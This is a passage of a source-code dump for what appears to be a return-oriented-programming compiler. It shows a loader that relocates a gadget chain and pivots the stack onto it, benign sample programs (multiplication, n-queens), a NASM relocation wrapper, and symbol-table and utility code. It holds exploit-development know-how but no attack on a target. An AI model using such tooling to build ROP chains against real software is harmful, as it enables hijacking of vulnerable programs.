} 480 | 481 | rv = fstat(fd, &st); 482 | if (rv) { 483 | perror("stat"); 484 | close(fd); 485 | return -1; 486 | } 487 | 488 | buf = calloc(1, SPACE + st.st_size); 489 | if (!buf) { 490 | perror("calloc"); 491 | close(fd); 492 | return -1; 493 | } 494 | buf += SPACE; 495 | 496 | sz = read(fd, buf, st.st_size); 497 | if (sz != st.st_size) { 498 | perror("read"); 499 | free(buf); 500 | close(fd); 501 | return -1; 502 | } 503 | 504 | close(fd); 505 | 506 | end = (uintptr_t *)(buf + st.st_size); 507 | while (*--end) { 508 | *(uintptr_t *)(*end + buf) += (uintptr_t)buf; 509 | } 510 | while (*--end) { 511 | *(uintptr_t *)(*end + buf) += slide; 512 | } 513 | 514 | printf("slide = 0x%zx, rope = %p\n", slide, (void *)buf); 515 | pivot(buf); 516 | return 0; 517 | } 518 | -------------------------------------------------------------------------------- /sample/rope.c: -------------------------------------------------------------------------------- 1 | #ifdef ARM64 2 | #define PRINTF_ATTR [[regparm=1]] 3 | #else 4 | #define PRINTF_ATTR 5 | #endif 6 | 7 | /* 8 | * If you want to run these against the loader, make sure the imports match: 9 | * getpid => getpid_ 10 | * ... 
/*
 * Sample: multiply a by b without a multiply of two variables, using
 * shift-and-add, then print the product and exit with status 42.
 */
#ifdef ARM64
#define PRINTF_ATTR [[regparm=1]]
#else
#define PRINTF_ATTR
#endif

extern printf PRINTF_ATTR;
extern exit [[noreturn]];

a = 5830;
b = 23958233;
// direct form, left disabled; the loop below computes the same product
;//[[stack=0x400]]printf("prod = %lu\n", a * b);

// P accumulates the product, M is the bit of a currently being tested
P = 0;
M = 1;
mul:
// bit M of a is clear: nothing to add for this position
if !(a & M) goto skip;
P = P + b;
skip:
// advance to the next bit; b is doubled in step so it always equals b << bit
M = M * 2;
b = b * 2;
// loop until M becomes 0 (presumably once the bit is shifted out of the machine word)
if (M) goto mul;
printf("prod = %lu\n", P);
exit(42);
/*
 * Sample: backtracking search written with the structured statements
 * (while / do-while / continue) of the ROP language. Every complete
 * solution is printed on its own line; the program then exits with 42.
 *
 * With QUEENS defined, a candidate is rejected when it equals an earlier
 * element (same row) or lies on a diagonal of one. Without it, only
 * equality is rejected.
 *
 * Conditions are written as differences because they are tested against
 * zero: "k + 1" is non-zero unless k == -1, and "!(k - n)" means k == n.
 */
#ifdef ARM64
#define PRINTF_ATTR [[regparm=1]]
#else
#define PRINTF_ATTR
#endif

// BITS selects the word size: element stride and sign-bit mask
#if BITS == 32
#define SIZEOF_LONG 4
#define SIGN_BIT 0x80000000
#else
#define SIZEOF_LONG 8
#define SIGN_BIT 0x8000000000000000
#endif

extern printf PRINTF_ATTR;
extern exit [[noreturn]];

/*
   Reference algorithm in C that the code below mirrors:

void
back(unsigned n, int *sol)
{
    int k;
    init(k = 0, n, sol);
    while (k >= 0) next: {
        if (k == n) {
            retsol(n, sol);
        } else {
            while (sol[k] < n) {
                sol[k]++;
                if (cont(k, sol)) {
                    init(++k, n, sol);
                    goto next;
                }
            }
        }
        k--;
    }
}
*/

#define QUEENS

n = 4;
sol = { 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // must have at least n + 1 elements. first element is already primed

k = 0;
// runs until k drops to -1, i.e. every position has been exhausted
while (k + 1) next: {
    if !(k - n) {
        // solution
        if (i = n) {
            // print the first n elements, one machine word apart
            sol_ptr = sol;
            do {
                [[stack=0x400]]printf(" %d", *sol_ptr);
                sol_ptr = sol_ptr + SIZEOF_LONG;
            } while (i = i - 1);
            [[stack=0x400]]printf("\n");
        }
backtrack:
        // step back one position; also reached by the goto at the bottom of the loop
        k = k - 1;
        continue;
    }
    // check the input domain [1..N]
    // dst_ptr and elt_ptr both address sol[k]
    dst_ptr = elt_ptr = sol + k * SIZEOF_LONG;
    // loop while sol[k] != n; "goto domain" presumably re-tests this condition -- TODO confirm
domain: while (*elt_ptr - n) {
        *dst_ptr = *elt_ptr + 1; // attempt next value
        cur_ptr = sol;
#ifdef QUEENS
        // j is the index of the earlier element cur_ptr points at
        j = 0;
#endif
        // compare sol[k] against every earlier element
        while (cur_ptr - elt_ptr) {
#ifdef QUEENS
            dif = *elt_ptr - *cur_ptr;
            if !(dif) goto domain; // (same row) try harder
            // absolute value: negate when the sign bit is set
            if (dif & SIGN_BIT) dif = 0 - dif;
            // value distance equals index distance (k - j)
            if !(dif - k + j) goto domain; // (same diag) try harder
            j = j + 1;
#else
            if !(*elt_ptr - *cur_ptr) goto domain; // try harder
#endif
            cur_ptr = cur_ptr + SIZEOF_LONG;
        }
        // candidate accepted: move on to the next position
        k = k + 1;
        new_ptr = elt_ptr + SIZEOF_LONG;
        *new_ptr = 0; // prime next element
        goto next;
    }
    // sol[k] reached n with no acceptable value left
    goto backtrack;
}
exit(42);
; Wrapper that turns the compiler output (rop-x86.asm) into a relocatable
; 32-bit strip. Layout, from `rope` to `rope_end`:
;   one word for the initial EBP
;   the strip itself (%include)
;   0, then one offset per `dg` word  (gadget relocs)
;   0, then one offset per `du` word  (pointer relocs)
; Offsets are relative to `rope`. The zero words terminate each table for
; a consumer that walks them backwards from `rope_end`.
rope:
    dd 0 ; initial EBP

; label generators: ___gadgetN / ___localN
%define LG(x) ___gadget %+ x
%define LU(x) ___local %+ x

; dg: define gadget -- emit the word under the next ___gadgetN label
%macro dg 1
LG(G): dd %1
%assign G G+1
%endmacro

; du: define local -- emit the word under the next ___localN label
%macro du 1
LU(U): dd %1
%assign U U+1
%endmacro

; G and U count the dg / du words emitted so far
%assign G 0
%assign U 0

%include "rop-x86.asm"

    align 4
    dd 0 ; begin gadget relocs

; one entry per dg word: its offset from the start of the strip
%assign R 0
%rep G
    dd LG(R) - rope
%assign R R+1
%endrep

    dd 0 ; begin pointer relocs

; one entry per du word: its offset from the start of the strip
%assign R 0
%rep U
    dd LU(R) - rope
%assign R R+1
%endrep

rope_end:
xstrdup(val) : NULL; 27 | p->next = symtab; 28 | } 29 | assert(p); 30 | return p; 31 | } 32 | 33 | 34 | const struct SYM * 35 | get_symbol(const char *key) 36 | { 37 | struct SYM *p; 38 | for (p = symtab; p; p = p->next) { 39 | if (!strcmp(p->key, key)) { 40 | break; 41 | } 42 | } 43 | return p; 44 | } 45 | 46 | 47 | void 48 | add_symbol_defined(const char *key, const void *val, int attr) 49 | { 50 | const struct SYM *p = get_symbol(key); 51 | if (p) { 52 | die("symbol '%s' already defined\n", key); 53 | } 54 | assert(val); 55 | symtab = new_symbol(key, val, SYMBOL_NORMAL); 56 | symtab->attr |= attr; 57 | } 58 | 59 | 60 | void 61 | add_symbol_forward(const char *key, int attr) 62 | { 63 | const struct SYM *p = get_symbol(key); 64 | if (p) { 65 | return; 66 | } 67 | symtab = new_symbol(key, NULL, SYMBOL_NORMAL); 68 | symtab->attr |= attr; 69 | } 70 | 71 | 72 | enum use_t 73 | get_symbol_used(const char *key) 74 | { 75 | const struct SYM *p = get_symbol(key); 76 | if (!p) { 77 | die("symbol '%s' not defined\n", key); 78 | } 79 | return p->used; 80 | } 81 | 82 | 83 | void 84 | make_symbol_used(const char *key) 85 | { 86 | struct SYM *p = (struct SYM *)get_symbol(key); // wrong cast 87 | if (!p) { 88 | die("symbol '%s' not defined\n", key); 89 | } 90 | if (p->type != SYMBOL_EXTERN) { 91 | if (p->type != SYMBOL_NORMAL) { 92 | cry("using symbol '%s' is probably wrong\n", key); 93 | } 94 | p->used = USED; 95 | } 96 | } 97 | 98 | 99 | void 100 | mark_all_used(enum use_t u) 101 | { 102 | struct SYM *p; 103 | for (p = symtab; p; p = p->next) { 104 | if (p->used == USED) { 105 | p->used = u; 106 | } 107 | } 108 | } 109 | 110 | 111 | BOOL 112 | try_symbol_extern(const char *key) 113 | { 114 | const struct SYM *p = get_symbol(key); 115 | if (!p) { 116 | /* XXX die("symbol '%s' not defined\n", key); */ 117 | return FALSE; 118 | } 119 | return (p->type == SYMBOL_EXTERN); 120 | } 121 | 122 | 123 | int 124 | try_symbol_attr(const char *key) 125 | { 126 | const struct SYM *p = 
/*
 * Print the data definitions for every symbol whose `used` field is UNUSED.
 *
 * First pass, by symbol type:
 *   SYMBOL_NORMAL with a value:
 *       value carries an address mark -> "du" with the mark stripped
 *       value names an extern         -> "dg" with the extern's address
 *       anything else                 -> "dd" with the value text
 *   SYMBOL_NORMAL without a value:
 *       "dd 0" when the symbol is volatile or `no_undefined` is set,
 *       otherwise only a ";-- name = ?" comment line
 *   SYMBOL_STRING / SYMBOL_EXTERN / SYMBOL_LABEL: nothing in this pass
 *   any other type is a vector: `type` is the element count and `val` is
 *       really a char ** array; each element is emitted like a normal value.
 *
 * Second pass: strings, emitted as "db <text>, 0" after all other data.
 *
 * NOTE(review): the vector elements are freed here while they are printed,
 * so calling this function twice would read freed memory.
 */
void
emit_symbols(void)
{
    struct SYM *p;
    for (p = symtab; p; p = p->next) {
        if (p->used == UNUSED) {
            switch (p->type) {
                case SYMBOL_NORMAL:
                    if (p->val) {
                        if (is_address(p->val)) {
                            /* strip the address mark before printing */
                            char *na = curate_address(p->val);
                            printx("%-7s du %s\n", p->key, na);
                            free(na);
                        } else if (try_symbol_extern(p->val)) {
                            /* get_symbol() cannot fail: try_symbol_extern() just found it */
                            printx("%-7s dg 0x%-28llX; -> %s\n", p->key, get_symbol(p->val)->addr, p->val);
                        } else {
                            printx("%-7s dd %s\n", p->key, p->val);
                        }
                    } else if (p->attr & ATTRIB_VOLATILE) {
                        printx("%-7s dd 0\n", p->key);
                    } else if (no_undefined) {
                        printx("%-7s dd 0\n", p->key);
                    } else {
                        printx(";-- %s = ?\n", p->key);
                    }
                    break;
                case SYMBOL_STRING:
                case SYMBOL_EXTERN:
                case SYMBOL_LABEL:
                    break;
                default: {
                    /* vector: p->type elements stored behind p->val */
                    int i;
                    printx("%s:\n", p->key);
                    for (i = 0; i < p->type; i++) {
                        char *val = ((char **)p->val)[i];
                        if (is_address(val)) {
                            char *na = curate_address(val);
                            printx(" du %s\n", na);
                            free(na);
                        } else if (try_symbol_extern(val)) {
                            printx(" dg 0x%-28llX; -> %s\n", get_symbol(val)->addr, val);
                        } else {
                            printx(" dd %s\n", val);
                        }
                        /* the element is released as soon as it has been printed */
                        free(val);
                    }
                }
            }
        }
    }
    /* strings go last */
    for (p = symtab; p; p = p->next) {
        if (p->used == UNUSED && p->type == SYMBOL_STRING) {
            printx("%-7s db %s, 0\n", p->key, p->val);
        }
    }
}
free_symbols(void) 210 | { 211 | struct SYM *p, *q; 212 | for (p = symtab; p; ) { 213 | q = p->next; 214 | #if 0 215 | if (p->used == UNUSED) { 216 | switch (p->type) { 217 | case SYMBOL_NORMAL: 218 | printf(";-- %s = %s\n", p->key, p->val ? p->val : "?"); 219 | break; 220 | case SYMBOL_STRING: 221 | printf(";-- %s = %s, 0\n", p->key, p->val); 222 | break; 223 | case SYMBOL_EXTERN: 224 | case SYMBOL_LABEL: 225 | break; 226 | default: { 227 | int i; 228 | printf(";-- %s = {\n", p->key); 229 | for (i = 0; i < p->type; i++) { 230 | char *val = ((char **)p->val)[i]; 231 | printf("\t%s\n", val); 232 | free(val); 233 | } 234 | printf("}\n"); 235 | } 236 | } 237 | } 238 | #endif 239 | free(p->key); 240 | free(p->val); 241 | free(p); 242 | p = q; 243 | } 244 | symtab = p; 245 | } 246 | 247 | 248 | /*** strings ******************************************************************/ 249 | 250 | 251 | char * 252 | add_string(const char *arg) 253 | { 254 | char *tmp; 255 | struct SYM *p; 256 | char *esc = NULL; 257 | if (nasm_esc_str) { 258 | size_t len = strlen(arg); 259 | assert(len); 260 | esc = xmalloc(len + 1); 261 | memmove(esc, arg, len + 1); 262 | esc[0] = esc[len - 1] = '`'; 263 | arg = esc; 264 | } 265 | for (p = symtab; p; p = p->next) { 266 | if (p->type == SYMBOL_STRING && !strcmp(p->val, arg)) { 267 | free(esc); 268 | return p->key; 269 | } 270 | } 271 | tmp = new_name("str"); 272 | symtab = new_symbol(tmp, arg, SYMBOL_STRING); 273 | free(tmp); 274 | free(esc); 275 | return symtab->key; 276 | } 277 | 278 | 279 | char * 280 | add_vector(const char **args, int narg) 281 | { 282 | char *tmp; 283 | assert(narg); 284 | tmp = new_name("vec"); /* XXX coallesce */ 285 | symtab = new_symbol(tmp, NULL, narg); 286 | free(tmp); 287 | symtab->val = (void *)args; /* XXX abuse */ 288 | return symtab->key; 289 | } 290 | 291 | 292 | void 293 | add_extern(const char *import, unsigned long long addr, int attr, int regparm) 294 | { 295 | const struct SYM *p = get_symbol(import); 296 | 
if (p) { 297 | die("symbol '%s' already defined\n", import); 298 | } 299 | symtab = new_symbol(import, NULL, SYMBOL_EXTERN); 300 | symtab->addr = addr; 301 | symtab->attr = attr; 302 | symtab->regparm = regparm; 303 | symtab->restack = -1; 304 | } 305 | 306 | 307 | void 308 | add_label(const char *label, int idx) 309 | { 310 | const struct SYM *p = get_symbol(label); 311 | if (p) { 312 | die("symbol '%s' already defined\n", label); 313 | } 314 | symtab = new_symbol(label, NULL, SYMBOL_LABEL); 315 | symtab->idx = idx; 316 | } 317 | 318 | 319 | const char * 320 | get_label_with_label(const char *target) 321 | { 322 | struct SYM *p; 323 | for (p = symtab; p; p = p->next) { 324 | if (p->type == SYMBOL_LABEL && p->val && !strcmp(p->val, target)) { 325 | return p->key; 326 | } 327 | } 328 | return NULL; 329 | } 330 | 331 | 332 | void 333 | set_label_with_label(const char *label, const char *target) 334 | { 335 | struct SYM *p = (struct SYM *)get_symbol(label); // wrong cast 336 | if (!p) { 337 | die("symbol '%s' not defined\n", label); 338 | } 339 | if (p->type != SYMBOL_LABEL) { 340 | die("symbol '%s' is not a label\n", label); 341 | } 342 | if (p->val) { 343 | die("symbol '%s' cannot be reused\n", label); 344 | } 345 | p->val = xstrdup(target); 346 | } 347 | -------------------------------------------------------------------------------- /symtab.h: -------------------------------------------------------------------------------- 1 | #ifndef SYMTAB_H_ 2 | #define SYMTAB_H_ 3 | 4 | #define SYMBOL_VECTOR >0 /* number of elements */ 5 | #define SYMBOL_NORMAL 0 6 | #define SYMBOL_STRING -1 7 | #define SYMBOL_EXTERN -2 8 | #define SYMBOL_LABEL -3 9 | 10 | #define ATTRIB_CONSTANT (1<<0) 11 | #define ATTRIB_VOLATILE (1<<1) 12 | #define ATTRIB_NORETURN (1<<2) 13 | #define ATTRIB_STDCALL (1<<3) 14 | #define ATTRIB_STACK (1<<4) 15 | #define ATTRIB_REGPARM (1<<5) 16 | #define ATTRIB_UNKNOWN (1<<31) 17 | 18 | enum use_t { 19 | CLOBBERED = -1, 20 | UNUSED, 21 | USED, 22 | PROTECTED 
/*
 * malloc() that never returns NULL.
 *
 * On allocation failure a message is written to stderr and the program is
 * aborted. The check is explicit rather than an assert() so that it is not
 * compiled out when NDEBUG is defined.
 *
 * A request for 0 bytes is rounded up to 1: malloc(0) may legitimately
 * return NULL, which would otherwise be mistaken for an out-of-memory
 * condition.
 *
 * The caller owns the returned block and releases it with free().
 */
void *
xmalloc(size_t size)
{
    void *p = malloc(size ? size : 1);
    if (!p) {
        fprintf(stderr, "out of memory\n");
        abort();
    }
    return p;
}
/*
 * Return a newly allocated copy of `str` with the character `ch` placed in
 * front of it.
 *
 * The length is kept in a size_t (strlen's own type) instead of an int, and
 * allocation failure aborts explicitly instead of relying on assert(),
 * which is compiled out under NDEBUG.
 *
 * The caller owns the result and releases it with free().
 */
char *
prepend(int ch, const char *str)
{
    size_t len = strlen(str) + 1;   /* bytes to copy, terminator included */
    char *p = malloc(len + 1);
    if (!p) {
        fprintf(stderr, "out of memory\n");
        abort();
    }
    p[0] = (char)ch;
    memcpy(p + 1, str, len);
    return p;
}
/*
 * Build the text "(str1 op str2)" in a newly allocated string.
 *
 * For the commutative operators + * & | ^ the operands are swapped when
 * only the second one carries an address mark, so that an address always
 * ends up on the left. Both operands being addresses is not allowed for
 * those operators (asserted).
 *
 * The caller owns the result and releases it with free().
 */
char *
create_op_str(const char *str1, const char *str2, int op)
{
    size_t size;
    char *p;
#if 0
    /*
     * Disabled: fold the expression when both operands are plain numbers.
     * Kept for reference; '|' and '^' previously applied '&' by mistake.
     */
    do {
        unsigned long long num1;
        unsigned long long num2;
        errno = 0;
        num1 = strtoull(str1, &p, 0);
        if (errno || p <= str1 || *p) {
            break;
        }
        errno = 0;
        num2 = strtoull(str2, &p, 0);
        if (errno || p <= str2 || *p) {
            break;
        }
        switch (op) {
            case '+':
                num1 += num2;
                break;
            case '-':
                num1 -= num2;
                break;
            case '*':
                num1 *= num2;
                break;
            case '&':
                num1 &= num2;
                break;
            case '|':
                num1 |= num2;
                break;
            case '^':
                num1 ^= num2;
                break;
            default:
                /* unknown operator: leave the do/while(0) without folding */
                continue;
        }
        p = malloc(32);
        if (!p) {
            break;
        }
        sprintf(p, "%llu", num1);
        return p;
    } while (0);
#endif
    if (is_address(str2) && (op == '+' || op == '*' || op == '&' || op == '|' || op == '^')) {
        const char *tmp;
        assert(!is_address(str1));
        tmp = str1;
        str1 = str2;
        str2 = tmp;
    }
    /* both operands plus "(", " op ", ")" and the terminator */
    size = strlen(str1) + strlen(str2) + sizeof("( x )");
    p = xmalloc(size);
    snprintf(p, size, "(%s %c %s)", str1, op, str2);
    return p;
}
/*
 * Extract the symbol name that follows the address mark in `str`.
 *
 * The name is the run of alphanumeric / underscore characters directly
 * after the mark. Returns a newly allocated copy of it (possibly empty),
 * or NULL when `str` contains no address mark. The caller frees the result.
 */
char *
copy_address_sym(const char *str)
{
    const char *name;
    const char *s;
    size_t len;
    char *p;

    str = is_address(str);
    if (!str) {
        return NULL;
    }
    name = str + 1;
    /* <ctype.h> functions are undefined for negative char values: go through unsigned char */
    for (s = name; isalnu_((unsigned char)*s); s++) {
    }
    len = (size_t)(s - name);
    p = xmalloc(len + 1);
    memcpy(p, name, len);
    p[len] = '\0';
    return p;
}
352 | { 353 | int rv; 354 | va_list ap; 355 | va_start(ap, fmt); 356 | rv = vfprintf(outfp ? outfp : stdout, fmt, ap); 357 | va_end(ap); 358 | return rv; 359 | } 360 | 361 | void 362 | new_printer(const char *filename) 363 | { 364 | if (outfn) { 365 | FILE *f; 366 | char buf[BUFSIZ]; 367 | assert(outfp); 368 | fflush(outfp); 369 | rewind(outfp); 370 | f = fopen(outfn, "wt"); 371 | if (!f) { 372 | errx(1, "cannot write to '%s'", outfn); 373 | } 374 | while (fgets(buf, sizeof(buf), outfp)) { 375 | fputs(buf, f); 376 | } 377 | fclose(f); 378 | fclose(outfp); 379 | free(outfn); 380 | } 381 | 382 | if (!filename) { 383 | outfn = NULL; 384 | outfp = NULL; 385 | return; 386 | } 387 | 388 | outfn = xstrdup(filename); 389 | outfp = tmpfile(); 390 | assert(outfp); 391 | unlink(outfn); 392 | } 393 | -------------------------------------------------------------------------------- /util.h: -------------------------------------------------------------------------------- 1 | #ifndef UTIL_H_ 2 | #define UTIL_H_ 3 | 4 | #ifndef FALSE 5 | #define FALSE 0 6 | #define TRUE !FALSE 7 | typedef int BOOL; 8 | #endif 9 | /* 10 | #include 11 | #define BOOL bool 12 | #define TRUE true 13 | #define FALSE false 14 | */ 15 | 16 | #define SWAP_PTR(s, a, b) \ 17 | do { \ 18 | if (s) { \ 19 | const void *tmp = a; \ 20 | a = b; \ 21 | b = (void *)tmp; \ 22 | } \ 23 | } while (0) 24 | 25 | #ifndef __GNUC__ 26 | int popcount(unsigned int v); 27 | #else 28 | #define popcount __builtin_popcount 29 | #endif 30 | 31 | void *xmalloc(size_t size); 32 | char *xstrdup(const char *s); 33 | 34 | void *reverse_list(void *n); 35 | void *append_list(void *list, void *n); 36 | 37 | char *new_name(const char *tmpl); 38 | char *prepend(int ch, const char *str); 39 | 40 | char *create_address_str(const char *str, int offset); 41 | char *create_number_str(BOOL negative, const char *str); 42 | char *create_op_str(const char *str1, const char *str2, int op); 43 | 44 | int is_pot_str(const char *str); 45 | 46 | const 
char *is_address(const char *str); 47 | char *curate_address(const char *str); 48 | char *copy_address_sym(const char *str); 49 | 50 | unsigned int hash(const char *p); 51 | 52 | void die(const char *fmt, ...) __attribute__ ((format(printf, 1, 2), noreturn)); 53 | void cry(const char *fmt, ...) __attribute__ ((format(printf, 1, 2))); 54 | 55 | int printx(const char *fmt, ...) __attribute__ ((format(printf, 1, 2))); 56 | void new_printer(const char *filename); 57 | 58 | #endif 59 | --------------------------------------------------------------------------------